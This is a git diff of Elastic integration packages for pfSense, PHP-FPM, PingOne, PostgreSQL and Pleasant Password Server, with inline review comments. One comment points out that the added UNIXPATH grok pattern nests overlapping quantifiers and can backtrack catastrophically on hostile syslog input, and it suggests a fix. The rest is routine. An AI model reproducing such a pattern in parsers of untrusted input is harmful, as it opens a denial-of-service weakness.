@@ -1,19 +1,17 @@ version: '2.3' services: pfsense-log-udp: - image: docker.elastic.co/observability/stream:v0.6.1 + image: docker.elastic.co/observability/stream:v0.15.0 volumes: - ./sample_logs:/sample_logs:ro command: log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9999 -p=udp /sample_logs/*.log pfsense-log-tcp: - image: docker.elastic.co/observability/stream:v0.6.1 + image: docker.elastic.co/observability/stream:v0.15.0 volumes: - ./sample_logs:/sample_logs:ro - entrypoint: /bin/bash - command: -c "/stream log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9999 -p=tcp /sample_logs/*.log" + command: log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9999 -p=tcp /sample_logs/*.log pfsense-log-tls: - image: docker.elastic.co/observability/stream:v0.6.1 + image: docker.elastic.co/observability/stream:v0.15.0 volumes: - ./sample_logs:/sample_logs:ro - entrypoint: /bin/bash - command: -c "/stream log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9999 -p=tls --insecure /sample_logs/*.log" + command: log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9999 -p=tls --insecure /sample_logs/*.log diff --git a/packages/pfsense/changelog.yml b/packages/pfsense/changelog.yml index 6d3dfc84b8a..0bd6c9f95e6 100644 --- a/packages/pfsense/changelog.yml +++ b/packages/pfsense/changelog.yml @@ -1,4 +1,14 @@ # newer versions go on top +- version: "1.19.1" + changes: + - description: Fix ingest pipeline warnings + type: bugfix + link: https://github.com/elastic/integrations/pulls/9575 +- version: "1.19.0" + changes: + - description: Update package spec to 3.0.3. + type: enhancement + link: https://github.com/elastic/integrations/pull/9235 - version: 1.18.0 changes: - description: ECS version updated to 8.11.0. diff --git a/packages/pfsense/data_stream/log/elasticsearch/ingest_pipeline/default.yml b/packages/pfsense/data_stream/log/elasticsearch/ingest_pipeline/default.yml index 8590debe9f3..dc08f7c5d8c 100644 
--- a/packages/pfsense/data_stream/log/elasticsearch/ingest_pipeline/default.yml +++ b/packages/pfsense/data_stream/log/elasticsearch/ingest_pipeline/default.yml @@ -36,7 +36,8 @@ processors: SYSLOG_TIMESTAMP_FORMAT: '%{TIMESTAMP_ISO8601:_tmp.timestamp8601}%{SPACE}%{OBSERVER}%{SPACE}%{PROCESS}%{SPACE}(%{POSINT:process.pid:long}|-) - (-|%{META})' TIMESTAMP_ISO8601: '%{YEAR}-%{MONTHNUM}-%{MONTHDAY}[T ]%{HOUR}:?%{MINUTE}(?::?%{SECOND})?%{ISO8601_TIMEZONE:event.timezone}?' OBSERVER: '(?:%{IP:observer.ip}|%{HOSTNAME:observer.name})' - PROCESS: '(\(%{DATA:process.name}\)|(?:%{UNIXPATH}*/)?%{BASEPATH:process.name})' + UNIXPATH: '(/([\w_%!$@:.,+~-]+|\\.)*)*' + PROCESS: '(\(%{DATA:process.name}\)|(?:%{UNIXPATH})%{BASEPATH:process.name})' BASEPATH: '[[[:alnum:]]_%!$@:.,+~-]+' META: '\[[^\]]*\]' - date: diff --git a/packages/pfsense/manifest.yml b/packages/pfsense/manifest.yml index 9f3971badbd..3852759b2ad 100644 --- a/packages/pfsense/manifest.yml +++ b/packages/pfsense/manifest.yml @@ -1,6 +1,6 @@ name: pfsense title: pfSense -version: "1.18.0" +version: "1.19.1" description: Collect logs from pfSense and OPNsense with Elastic Agent. type: integration icons: @@ -8,7 +8,7 @@ icons: title: pfsense size: 512x143 type: image/svg+xml -format_version: "3.0.0" +format_version: "3.0.3" categories: - network - security diff --git a/packages/php_fpm/_dev/build/docs/README.md b/packages/php_fpm/_dev/build/docs/README.md index 8596a592dac..c56e41f9441 100644 --- a/packages/php_fpm/_dev/build/docs/README.md +++ b/packages/php_fpm/_dev/build/docs/README.md 
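Review bot: The new `UNIXPATH` definition keeps the `([\w_%!$@:.,+~-]+|\\.)*` segment body, a `(x+)*` nesting whose alternatives overlap, so a long run of path characters that ultimately fails to match (the `PROCESS` alternative is tried against syslog text the sender controls) makes the regex engine backtrack through every partition of that run. Since the pattern is now defined locally rather than inherited from the stock grok library, this is the place to remove the ambiguity without changing what it matches: `UNIXPATH: '(/([\w_%!$@:.,+~-]|\\.)*)*'`. The grok watchdog in Elasticsearch bounds the damage, but a cheaper pattern avoids it being tripped by hostile input in the first place.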
@@ -4,14 +4,24 @@ PHP-FPM (FastCGI Process Manager) is a web tool used to speed up the performance of a website. It is much faster than traditional CGI based methods and has the ability to handle tremendous loads simultaneously. +Use the PHP-FPM integration to: + +- Collect metrics related to the pool and process. +- Create visualizations to monitor, measure, and analyze usage trends and key data, deriving business insights. +- Create alerts to reduce the MTTD and MTTR by referencing relevant logs when troubleshooting an issue. + ## Data streams The PHP-FPM integration collects metrics data. -Metrics give you insight into the statistics of the PHP-FPM. Metrics data streams collected by the PHP-FPM integration include [pool](https://www.php.net/manual/en/fpm.status.php#:~:text=Basic%20information%20%2D%20Always%20displayed%20on%20the%20status%20page) and [process](https://www.php.net/manual/en/fpm.status.php#:~:text=Per%2Dprocess%20information%20%2D%20only%20displayed%20in%20full%20output%20mode) so that the user can monitor and troubleshoot the performance of the PHP-FPM instances. +Metrics provide insight into the statistics of the PHP-FPM. The Metrics data streams collected by the PHP-FPM integration include [pool](https://www.php.net/manual/en/fpm.status.php#:~:text=Basic%20information%20%2D%20Always%20displayed%20on%20the%20status%20page) and [process](https://www.php.net/manual/en/fpm.status.php#:~:text=Per%2Dprocess%20information%20%2D%20only%20displayed%20in%20full%20output%20mode) so that the user can monitor and troubleshoot the performance of the PHP-FPM instances. + +Data streams: +- `pool`: Collects information related to the connection handling, queue metrics, process manager configuration, process activity and performance indicators. +- `process`: Collects information related to the request metrics, the latest CPU and memory usage and the current running state. 
Note: -- Users can monitor and see the metrics inside the ingested documents for PHP-FPM in the logs-* index pattern from `Discover`. +- Users can monitor and view the metrics inside the ingested documents for PHP-FPM in the `logs-*` index pattern in `Discover`. ## Compatibility 
@@ -29,107 +39,25 @@ Example host configuration: `http://localhost:8080` Status path configuration format: `/path` -Example Status path configuration: `/status` - -### Troubleshooting - -If host.ip is shown conflicted under ``logs-*`` data view, then this issue can be solved by reindexing the ``Pool`` and ``Process`` data stream's indices. -To reindex the data, the following steps must be performed. - -1. Stop the data stream by going to `Integrations -> PHP-FPM -> Integration policies` open the configuration of PHP-FPM and disable the `Collect PHP-FPM metrics` toggle to reindex metrics data stream and save the integration. - -2. Copy data into the temporary index and delete the existing data stream and index template by performing the following steps in the Dev tools. - -``` -POST _reindex -{ - "source": { - "index": "" - }, - "dest": { - "index": "temp_index" - } -} -``` -Example: -``` -POST _reindex -{ - "source": { - "index": "logs-php_fpm.pool-default" - }, - "dest": { - "index": "temp_index" - } -} -``` - -``` -DELETE /_data_stream/ -``` -Example: -``` -DELETE /_data_stream/logs-php_fpm.pool-default -``` - -``` -DELETE _index_template/ -``` -Example: -``` -DELETE _index_template/logs-php_fpm.pool -``` -3. Go to `Integrations -> PHP-FPM -> Settings` and click on `Reinstall PHP-FPM`. - -4. Copy data from temporary index to new index by performing the following steps in the Dev tools. - -``` -POST _reindex -{ - "conflicts": "proceed", - "source": { - "index": "temp_index" - }, - "dest": { - "index": "", - "op_type": "create" - - } -} -``` -Example: -``` -POST _reindex -{ - "conflicts": "proceed", - "source": { - "index": "temp_index" - }, - "dest": { - "index": "logs-php_fpm.pool-default", - "op_type": "create" - - } -} -``` - -5. Verify data is reindexed completely. - -6. 
Start the data stream by going to the `Integrations -> PHP-FPM -> Integration policies` and open configuration of integration and enable the `Collect PHP-FPM metrics` toggle and save the integration. - -7. Delete temporary index by performing the following step in the Dev tools. - -``` -DELETE temp_index -``` - -More details about reindexing can be found [here](https://www.elastic.co/guide/en/elasticsearch/reference/current/docs-reindex.html). +Example Status path configuration: `/status` + +## Setup + +For step-by-step instructions on how to set up an integration, see the [Getting Started](https://www.elastic.co/guide/en/welcome-to-elastic/current/getting-started-observability.html) guide. + +## Validation + +After successfully configuring the integration, click on the *Assets* tab of the PHP-FPM integration to display the available dashboards. Select the dashboard for your configured data stream, which should be populated with the required data. + +## Troubleshooting + +If `host.ip` appears conflicted under the ``logs-*`` data view, this issue can be resolved by [reindexing](https://www.elastic.co/guide/en/elasticsearch/reference/current/use-a-data-stream.html#reindex-with-a-data-stream) the indices of the ``Pool`` and ``Process`` data streams. ## Metrics reference ### Pool -This is the `pool` data stream. `pool` data stream collects metrics related to the setup and contents of the FPM status page. +The `pool` data stream collects metrics related to the setup and contents of the FPM status page. {{event "pool"}} @@ -137,7 +65,7 @@ This is the `pool` data stream. `pool` data stream collects metrics related to t ### Process -This is the `process` data stream. `process` data stream collects metrics like request duration, content length, process state, etc. +The `process` data stream collects metrics related to the request duration, content length, process state, etc. {{event "process"}} 
diff --git a/packages/php_fpm/changelog.yml b/packages/php_fpm/changelog.yml index f2ddab2cbbd..51ac1e44a79 100644 --- a/packages/php_fpm/changelog.yml +++ b/packages/php_fpm/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.2.1" + changes: + - description: Update README to follow documentation guidelines. + type: enhancement + link: https://github.com/elastic/integrations/pull/9069 - version: "1.2.0" changes: - description: Limit request tracer log count to five. diff --git a/packages/php_fpm/docs/README.md b/packages/php_fpm/docs/README.md index 9a891af8f14..412d09938fd 100644 --- a/packages/php_fpm/docs/README.md +++ b/packages/php_fpm/docs/README.md 
@@ -4,14 +4,24 @@ PHP-FPM (FastCGI Process Manager) is a web tool used to speed up the performance of a website. It is much faster than traditional CGI based methods and has the ability to handle tremendous loads simultaneously. +Use the PHP-FPM integration to: + +- Collect metrics related to the pool and process. +- Create visualizations to monitor, measure, and analyze usage trends and key data, deriving business insights. +- Create alerts to reduce the MTTD and MTTR by referencing relevant logs when troubleshooting an issue. + ## Data streams The PHP-FPM integration collects metrics data. -Metrics give you insight into the statistics of the PHP-FPM. Metrics data streams collected by the PHP-FPM integration include [pool](https://www.php.net/manual/en/fpm.status.php#:~:text=Basic%20information%20%2D%20Always%20displayed%20on%20the%20status%20page) and [process](https://www.php.net/manual/en/fpm.status.php#:~:text=Per%2Dprocess%20information%20%2D%20only%20displayed%20in%20full%20output%20mode) so that the user can monitor and troubleshoot the performance of the PHP-FPM instances. +Metrics provide insight into the statistics of the PHP-FPM. The Metrics data streams collected by the PHP-FPM integration include [pool](https://www.php.net/manual/en/fpm.status.php#:~:text=Basic%20information%20%2D%20Always%20displayed%20on%20the%20status%20page) and [process](https://www.php.net/manual/en/fpm.status.php#:~:text=Per%2Dprocess%20information%20%2D%20only%20displayed%20in%20full%20output%20mode) so that the user can monitor and troubleshoot the performance of the PHP-FPM instances. + +Data streams: +- `pool`: Collects information related to the connection handling, queue metrics, process manager configuration, process activity and performance indicators. +- `process`: Collects information related to the request metrics, the latest CPU and memory usage and the current running state. 
Note: -- Users can monitor and see the metrics inside the ingested documents for PHP-FPM in the logs-* index pattern from `Discover`. +- Users can monitor and view the metrics inside the ingested documents for PHP-FPM in the `logs-*` index pattern in `Discover`. ## Compatibility 
@@ -29,107 +39,25 @@ Example host configuration: `http://localhost:8080` Status path configuration format: `/path` -Example Status path configuration: `/status` - -### Troubleshooting +Example Status path configuration: `/status` -If host.ip is shown conflicted under ``logs-*`` data view, then this issue can be solved by reindexing the ``Pool`` and ``Process`` data stream's indices. -To reindex the data, the following steps must be performed. +## Setup -1. Stop the data stream by going to `Integrations -> PHP-FPM -> Integration policies` open the configuration of PHP-FPM and disable the `Collect PHP-FPM metrics` toggle to reindex metrics data stream and save the integration. +For step-by-step instructions on how to set up an integration, see the [Getting Started](https://www.elastic.co/guide/en/welcome-to-elastic/current/getting-started-observability.html) guide. -2. Copy data into the temporary index and delete the existing data stream and index template by performing the following steps in the Dev tools. +## Validation -``` -POST _reindex -{ - "source": { - "index": "" - }, - "dest": { - "index": "temp_index" - } -} -``` -Example: -``` -POST _reindex -{ - "source": { - "index": "logs-php_fpm.pool-default" - }, - "dest": { - "index": "temp_index" - } -} -``` +After successfully configuring the integration, click on the *Assets* tab of the PHP-FPM integration to display the available dashboards. Select the dashboard for your configured data stream, which should be populated with the required data. -``` -DELETE /_data_stream/ -``` -Example: -``` -DELETE /_data_stream/logs-php_fpm.pool-default -``` - -``` -DELETE _index_template/ -``` -Example: -``` -DELETE _index_template/logs-php_fpm.pool -``` -3. Go to `Integrations -> PHP-FPM -> Settings` and click on `Reinstall PHP-FPM`. - -4. Copy data from temporary index to new index by performing the following steps in the Dev tools. 
- -``` -POST _reindex -{ - "conflicts": "proceed", - "source": { - "index": "temp_index" - }, - "dest": { - "index": "", - "op_type": "create" - - } -} -``` -Example: -``` -POST _reindex -{ - "conflicts": "proceed", - "source": { - "index": "temp_index" - }, - "dest": { - "index": "logs-php_fpm.pool-default", - "op_type": "create" - - } -} -``` - -5. Verify data is reindexed completely. - -6. Start the data stream by going to the `Integrations -> PHP-FPM -> Integration policies` and open configuration of integration and enable the `Collect PHP-FPM metrics` toggle and save the integration. - -7. Delete temporary index by performing the following step in the Dev tools. - -``` -DELETE temp_index -``` +## Troubleshooting -More details about reindexing can be found [here](https://www.elastic.co/guide/en/elasticsearch/reference/current/docs-reindex.html). +If `host.ip` appears conflicted under the ``logs-*`` data view, this issue can be resolved by [reindexing](https://www.elastic.co/guide/en/elasticsearch/reference/current/use-a-data-stream.html#reindex-with-a-data-stream) the indices of the ``Pool`` and ``Process`` data streams. ## Metrics reference ### Pool -This is the `pool` data stream. `pool` data stream collects metrics related to the setup and contents of the FPM status page. +The `pool` data stream collects metrics related to the setup and contents of the FPM status page. An example event for `pool` looks as following: @@ -255,7 +183,7 @@ An example event for `pool` looks as following: ### Process -This is the `process` data stream. `process` data stream collects metrics like request duration, content length, process state, etc. +The `process` data stream collects metrics related to the request duration, content length, process state, etc. An example event for `process` looks as following: diff --git a/packages/php_fpm/manifest.yml b/packages/php_fpm/manifest.yml index 485893cb3fa..d21e6eb5fe0 100644 --- a/packages/php_fpm/manifest.yml 
+++ b/packages/php_fpm/manifest.yml @@ -1,7 +1,7 @@ format_version: "3.0.0" name: php_fpm title: PHP-FPM -version: "1.2.0" +version: "1.2.1" description: This Elastic integration collects metrics from PHP-FPM. type: integration categories: diff --git a/packages/ping_one/changelog.yml b/packages/ping_one/changelog.yml index 4290a941d15..498b32cb86f 100644 --- a/packages/ping_one/changelog.yml +++ b/packages/ping_one/changelog.yml @@ -1,4 +1,14 @@ # newer versions go on top +- version: "1.14.0" + changes: + - description: Set sensitive values as secret. + type: enhancement + link: https://github.com/elastic/integrations/pull/9128 +- version: "1.13.2" + changes: + - description: Fix ingest pipeline conditional field handling. + type: bugfix + link: https://github.com/elastic/integrations/pull/9076 - version: "1.13.1" changes: - description: Changed owners diff --git a/packages/ping_one/data_stream/audit/elasticsearch/ingest_pipeline/default.yml b/packages/ping_one/data_stream/audit/elasticsearch/ingest_pipeline/default.yml index 26f69500c9d..c10a35aa0c6 100644 --- a/packages/ping_one/data_stream/audit/elasticsearch/ingest_pipeline/default.yml +++ b/packages/ping_one/data_stream/audit/elasticsearch/ingest_pipeline/default.yml 
@@ -21,51 +21,57 @@ processors:
 value: [iam]
 - append:
 field: event.category
- if: ctx.json?.action?.type?.toLowerCase().contains('created') || ctx.json.action.type.toLowerCase().contains('deleted') || ctx.json.action.type.toLowerCase().contains('updated') || ctx.json.action.type.toLowerCase().contains('access_allowed')
+ if: >-
+ ctx.json?.action?.type != null && (
+ ctx.json.action.type.toLowerCase().contains('created') ||
+ ctx.json.action.type.toLowerCase().contains('deleted') ||
+ ctx.json.action.type.toLowerCase().contains('updated') ||
+ ctx.json.action.type.toLowerCase().contains('access_allowed')
+ )
 value: [configuration]
 - append:
 field: event.type
- if: ctx.json?.action?.type?.toLowerCase().contains('created')
+ if: ctx.json?.action?.type?.toLowerCase()?.contains('created') == true
 value: [creation]
 - append:
 field: event.type
- if: ctx.json?.action?.type?.toLowerCase().contains('deleted')
+ if: ctx.json?.action?.type?.toLowerCase()?.contains('deleted') == true
 value: [deletion]
 - append:
 field: event.type
- if: ctx.json?.action?.type?.toLowerCase().contains('updated')
+ if: ctx.json?.action?.type?.toLowerCase()?.contains('updated') == true
 value: [change]
 - append:
 field: event.type
- if: ctx.json?.action?.type?.toLowerCase().contains('user')
+ if: ctx.json?.action?.type?.toLowerCase()?.contains('user') == true
 value: [user]
 - append:
 field: event.type
- if: ctx.json?.action?.type?.toLowerCase().contains('group')
+ if: ctx.json?.action?.type?.toLowerCase()?.contains('group') == true
 value: [group]
 - append:
 field: event.type
- if: ctx.json?.action?.type?.toLowerCase().contains('allowed')
+ if: ctx.json?.action?.type?.toLowerCase()?.contains('allowed') == true
 value: [info]
 - append:
 field: event.type
- if: ctx.json?.action?.type?.toLowerCase().contains('denied')
+ if: ctx.json?.action?.type?.toLowerCase()?.contains('denied') == true
 value: [denied]
 - append:
 field: event.type
- if: ctx.json?.action?.type?.toLowerCase().contains('started')
+ if: ctx.json?.action?.type?.toLowerCase()?.contains('started') == true
 value: [start]
 - append:
 field: event.type
- if: ctx.json?.action?.type?.toLowerCase().contains('access_allowed')
+ if: ctx.json?.action?.type?.toLowerCase()?.contains('access_allowed') == true
 value: [access]
 - append:
 field: event.category
- if: ctx.json?.action?.type?.toLowerCase().contains('password.check_succeeded')
+ if: ctx.json?.action?.type?.toLowerCase()?.contains('password.check_succeeded') == true
 value: [authentication]
 - append:
 field: event.category
- if: ctx.json?.action?.type?.toLowerCase().contains('email')
+ if: ctx.json?.action?.type?.toLowerCase()?.contains('email') == true
 value: [email]
 - set:
 field: event.type
diff --git a/packages/ping_one/manifest.yml b/packages/ping_one/manifest.yml
index 81e8a60371d..a6b0682e161 100644
--- a/packages/ping_one/manifest.yml
+++ b/packages/ping_one/manifest.yml
@@ -1,7 +1,7 @@
-format_version: "3.0.0"
+format_version: "3.0.2"
 name: ping_one
 title: PingOne
-version: "1.13.1"
+version: "1.14.0"
 description: Collect logs from PingOne with Elastic-Agent.
 type: integration
 categories:
@@ -9,7 +9,7 @@ categories:
 - iam
 conditions:
 kibana:
- version: ^8.7.1
+ version: ^8.12.0
 screenshots:
 - src: /img/ping-one-dashboard.png
 title: PingOne Audit Dashboard Screenshot
@@ -72,12 +72,14 @@ policy_templates:
 description: The header to check for a specific value specified by `secret.value`.
 required: false
 show_user: false
+ secret: false
 - name: secret_value
 type: password
 title: Secret Value
 description: The secret stored in the header name specified by `secret.header`.
 required: false
 show_user: false
+ secret: true
 - type: httpjson
 title: Collect PingOne logs via API
 description: Collecting PingOne logs via API.
@@ -92,6 +94,7 @@ policy_templates:
 title: Token URL
 description: Token URL of the PingOne App.
 required: true
+ secret: false
 - name: environment_id
 type: text
 title: Environment ID
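Review bot: The `event.category: [configuration]` condition at the top of the hunk guards nulls with `ctx.json?.action?.type != null && (...)`, while every other condition in the same processor list now uses the `?.toLowerCase()?.contains(...) == true` form; the two are equivalent null-safe checks here, but mixing idioms in one list makes the next audit of these conditions harder. For consistency, write the first one as `ctx.json?.action?.type?.toLowerCase()?.contains('created') == true || ...` over the same four keywords, or put a one-line comment above it saying why the explicit guard was preferred. `action.type` is taken from the ingested document, so if it can ever arrive as something other than a string, `.toLowerCase()` would still throw under both forms and an `instanceof String` check (or an earlier `convert` processor) would be the place to handle that.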
@@ -107,6 +110,7 @@ policy_templates:
 title: Client Secret
 description: Client Secret.
 required: true
+ secret: true
 - name: proxy_url
 type: text
 title: Proxy URL
diff --git a/packages/postgresql/changelog.yml b/packages/postgresql/changelog.yml
index cf2f8782017..41d7330be15 100644
--- a/packages/postgresql/changelog.yml
+++ b/packages/postgresql/changelog.yml
@@ -1,4 +1,19 @@
 # newer versions go on top
+- version: "1.19.0"
+ changes:
+ - description: Enable secrets for sensitive fields. For more details, refer https://www.elastic.co/guide/en/fleet/current/agent-policy.html#agent-policy-secret-values
+ type: enhancement
+ link: https://github.com/elastic/integrations/pull/9321
+- version: "1.18.1"
+ changes:
+ - description: Disable secrets for older stack versions due to errors.
+ type: bugfix
+ link: https://github.com/elastic/integrations/pull/9279
+- version: "1.18.0"
+ changes:
+ - description: Enable 'secret' for the sensitive fields, supported from 8.12.
+ type: enhancement
+ link: https://github.com/elastic/integrations/pull/9009
 - version: "1.17.2"
 changes:
 - description: Improve wording on milliseconds.
diff --git a/packages/postgresql/manifest.yml b/packages/postgresql/manifest.yml
index 12b13bd2cbe..a5631260bf7 100644
--- a/packages/postgresql/manifest.yml
+++ b/packages/postgresql/manifest.yml
@@ -1,7 +1,7 @@
-format_version: "3.0.0"
+format_version: "3.0.2"
 name: postgresql
 title: PostgreSQL
-version: "1.17.2"
+version: "1.19.0"
 description: Collect logs and metrics from PostgreSQL servers with Elastic Agent.
 type: integration
 categories:
@@ -9,7 +9,7 @@ categories:
 - observability
 conditions:
 kibana:
- version: "^8.8.0"
+ version: "^8.12.0"
 elastic:
 subscription: basic
 screenshots:
@@ -56,6 +56,7 @@ policy_templates:
 - name: password
 type: password
 title: Password
+ secret: true
 owner:
 github: elastic/obs-infraobs-integrations
 type: elastic
diff --git a/packages/pps/LICENSE.txt b/packages/pps/LICENSE.txt
new file mode 100644
index 00000000000..d6456956733
--- /dev/null
+++ b/packages/pps/LICENSE.txt
@@ -0,0 +1,202 @@ + + Apache License + Version 2.0, January 2004 + http://www.apache.org/licenses/ + + TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION + + 1. Definitions. + + "License" shall mean the terms and conditions for use, reproduction, + and distribution as defined by Sections 1 through 9 of this document. + + "Licensor" shall mean the copyright owner or entity authorized by + the copyright owner that is granting the License. + + "Legal Entity" shall mean the union of the acting entity and all + other entities that control, are controlled by, or are under common + control with that entity. For the purposes of this definition, + "control" means (i) the power, direct or indirect, to cause the + direction or management of such entity, whether by contract or + otherwise, or (ii) ownership of fifty percent (50%) or more of the + outstanding shares, or (iii) beneficial ownership of such entity. + + "You" (or "Your") shall mean an individual or Legal Entity + exercising permissions granted by this License. + + "Source" form shall mean the preferred form for making modifications, + including but not limited to software source code, documentation + source, and configuration files. + + "Object" form shall mean any form resulting from mechanical + transformation or translation of a Source form, including but + not limited to compiled object code, generated documentation, + and conversions to other media types. + + "Work" shall mean the work of authorship, whether in Source or + Object form, made available under the License, as indicated by a + copyright notice that is included in or attached to the work + (an example is provided in the Appendix below). + + "Derivative Works" shall mean any work, whether in Source or Object + form, that is based on (or derived from) the Work and for which the + editorial revisions, annotations, elaborations, or other modifications + represent, as a whole, an original work of authorship. 
For the purposes + of this License, Derivative Works shall not include works that remain + separable from, or merely link (or bind by name) to the interfaces of, + the Work and Derivative Works thereof. + + "Contribution" shall mean any work of authorship, including + the original version of the Work and any modifications or additions + to that Work or Derivative Works thereof, that is intentionally + submitted to Licensor for inclusion in the Work by the copyright owner + or by an individual or Legal Entity authorized to submit on behalf of + the copyright owner. For the purposes of this definition, "submitted" + means any form of electronic, verbal, or written communication sent + to the Licensor or its representatives, including but not limited to + communication on electronic mailing lists, source code control systems, + and issue tracking systems that are managed by, or on behalf of, the + Licensor for the purpose of discussing and improving the Work, but + excluding communication that is conspicuously marked or otherwise + designated in writing by the copyright owner as "Not a Contribution." + + "Contributor" shall mean Licensor and any individual or Legal Entity + on behalf of whom a Contribution has been received by Licensor and + subsequently incorporated within the Work. + + 2. Grant of Copyright License. Subject to the terms and conditions of + this License, each Contributor hereby grants to You a perpetual, + worldwide, non-exclusive, no-charge, royalty-free, irrevocable + copyright license to reproduce, prepare Derivative Works of, + publicly display, publicly perform, sublicense, and distribute the + Work and such Derivative Works in Source or Object form. + + 3. Grant of Patent License. 
Subject to the terms and conditions of + this License, each Contributor hereby grants to You a perpetual, + worldwide, non-exclusive, no-charge, royalty-free, irrevocable + (except as stated in this section) patent license to make, have made, + use, offer to sell, sell, import, and otherwise transfer the Work, + where such license applies only to those patent claims licensable + by such Contributor that are necessarily infringed by their + Contribution(s) alone or by combination of their Contribution(s) + with the Work to which such Contribution(s) was submitted. If You + institute patent litigation against any entity (including a + cross-claim or counterclaim in a lawsuit) alleging that the Work + or a Contribution incorporated within the Work constitutes direct + or contributory patent infringement, then any patent licenses + granted to You under this License for that Work shall terminate + as of the date such litigation is filed. + + 4. Redistribution. You may reproduce and distribute copies of the + Work or Derivative Works thereof in any medium, with or without + modifications, and in Source or Object form, provided that You + meet the following conditions: + + (a) You must give any other recipients of the Work or + Derivative Works a copy of this License; and + + (b) You must cause any modified files to carry prominent notices + stating that You changed the files; and + + (c) You must retain, in the Source form of any Derivative Works + that You distribute, all copyright, patent, trademark, and + attribution notices from the Source form of the Work, + excluding those notices that do not pertain to any part of + the Derivative Works; and + + (d) If the Work includes a "NOTICE" text file as part of its + distribution, then any Derivative Works that You distribute must + include a readable copy of the attribution notices contained + within such NOTICE file, excluding those notices that do not + pertain to any part of the Derivative Works, in at least one + of 
the following places: within a NOTICE text file distributed + as part of the Derivative Works; within the Source form or + documentation, if provided along with the Derivative Works; or, + within a display generated by the Derivative Works, if and + wherever such third-party notices normally appear. The contents + of the NOTICE file are for informational purposes only and + do not modify the License. You may add Your own attribution + notices within Derivative Works that You distribute, alongside + or as an addendum to the NOTICE text from the Work, provided + that such additional attribution notices cannot be construed + as modifying the License. + + You may add Your own copyright statement to Your modifications and + may provide additional or different license terms and conditions + for use, reproduction, or distribution of Your modifications, or + for any such Derivative Works as a whole, provided Your use, + reproduction, and distribution of the Work otherwise complies with + the conditions stated in this License. + + 5. Submission of Contributions. Unless You explicitly state otherwise, + any Contribution intentionally submitted for inclusion in the Work + by You to the Licensor shall be under the terms and conditions of + this License, without any additional terms or conditions. + Notwithstanding the above, nothing herein shall supersede or modify + the terms of any separate license agreement you may have executed + with Licensor regarding such Contributions. + + 6. Trademarks. This License does not grant permission to use the trade + names, trademarks, service marks, or product names of the Licensor, + except as required for reasonable and customary use in describing the + origin of the Work and reproducing the content of the NOTICE file. + + 7. Disclaimer of Warranty. 
Unless required by applicable law or + agreed to in writing, Licensor provides the Work (and each + Contributor provides its Contributions) on an "AS IS" BASIS, + WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or + implied, including, without limitation, any warranties or conditions + of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A + PARTICULAR PURPOSE. You are solely responsible for determining the + appropriateness of using or redistributing the Work and assume any + risks associated with Your exercise of permissions under this License. + + 8. Limitation of Liability. In no event and under no legal theory, + whether in tort (including negligence), contract, or otherwise, + unless required by applicable law (such as deliberate and grossly + negligent acts) or agreed to in writing, shall any Contributor be + liable to You for damages, including any direct, indirect, special, + incidental, or consequential damages of any character arising as a + result of this License or out of the use or inability to use the + Work (including but not limited to damages for loss of goodwill, + work stoppage, computer failure or malfunction, or any and all + other commercial damages or losses), even if such Contributor + has been advised of the possibility of such damages. + + 9. Accepting Warranty or Additional Liability. While redistributing + the Work or Derivative Works thereof, You may choose to offer, + and charge a fee for, acceptance of support, warranty, indemnity, + or other liability obligations and/or rights consistent with this + License. However, in accepting such obligations, You may act only + on Your own behalf and on Your sole responsibility, not on behalf + of any other Contributor, and only if You agree to indemnify, + defend, and hold each Contributor harmless for any liability + incurred by, or claims asserted against, such Contributor by reason + of your accepting any such warranty or additional liability. 
+ + END OF TERMS AND CONDITIONS + + APPENDIX: How to apply the Apache License to your work. + + To apply the Apache License to your work, attach the following + boilerplate notice, with the fields enclosed by brackets "[]" + replaced with your own identifying information. (Don't include + the brackets!) The text should be enclosed in the appropriate + comment syntax for the file format. We also recommend that a + file or class name and description of purpose be included on the + same "printed page" as the copyright notice for easier + identification within third-party archives. + + Copyright [yyyy] [name of copyright owner] + + Licensed under the Apache License, Version 2.0 (the "License"); + you may not use this file except in compliance with the License. + You may obtain a copy of the License at + + http://www.apache.org/licenses/LICENSE-2.0 + + Unless required by applicable law or agreed to in writing, software + distributed under the License is distributed on an "AS IS" BASIS, + WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + See the License for the specific language governing permissions and + limitations under the License. diff --git a/packages/pps/_dev/build/build.yml b/packages/pps/_dev/build/build.yml new file mode 100644 index 00000000000..2bfcfc223b0 --- /dev/null +++ b/packages/pps/_dev/build/build.yml @@ -0,0 +1,3 @@ +dependencies: + ecs: + reference: "git@v8.11.0" diff --git a/packages/pps/_dev/build/docs/README.md b/packages/pps/_dev/build/docs/README.md new file mode 100644 index 00000000000..40fc7b71ac8 --- /dev/null +++ b/packages/pps/_dev/build/docs/README.md 
@@ -0,0 +1,44 @@ +# Pleasant Password Server + +The Pleasant Password Server integration collects and parses DNS, DHCP, and Audit data collected from [Pleasant Password Server](https://pleasantpasswords.com/) via TCP/UDP or logfile. + +## Setup steps +1. Enable the integration with TCP/UDP input. +2. Log in to the PPS WebUI. +3. Configure the PPS to send messages to a Syslog server using the following steps. + 1. From the Menu go to Logging -> Syslog Configuration + 2. Set the Syslog Configuration to Enabled + 3. Set Hostname to the Hostname of your Fleet Agent or Load Balancer + 4. Set the Correct Port used in the Integration Configuration + 5. Set UDP or TCP + 6. Optionally set the Facility + +## Compatibility + +This module has been tested against `Pleasant Password Server Version 7.11.44.0 `. +It should however work with all versions. + +## Log samples +Below are the samples logs of the respective category: + +## Audit Logs: +``` +<134>Jan 23 09:49:10 SRV-PPS-001 Pleasant Password Server:192.168.1.2 - user@name.test - - Success - Syslog Settings Changed - User Syslogging setting updated changing the host from to <127.0.0.1> changing the port fr 127.0.0.1 23/01 09:49:10.894 +<134>Jan 23 11:32:57 SRV-PPS-001 Pleasant Password Server:192.168.1.2 - user@name.test - - Success - Password Fetched - User fetched the password for - test 127.0.0.1 23/01 11:32:57.857 +<134>Jan 23 12:20:07 SRV-PPS-001 Pleasant Password Server:0.0.0.0 - Backup Restore Service - - Success - Backup Occurred - User backing up database to Jan 23 12:37:37 SRV-PPS-001 Pleasant Password 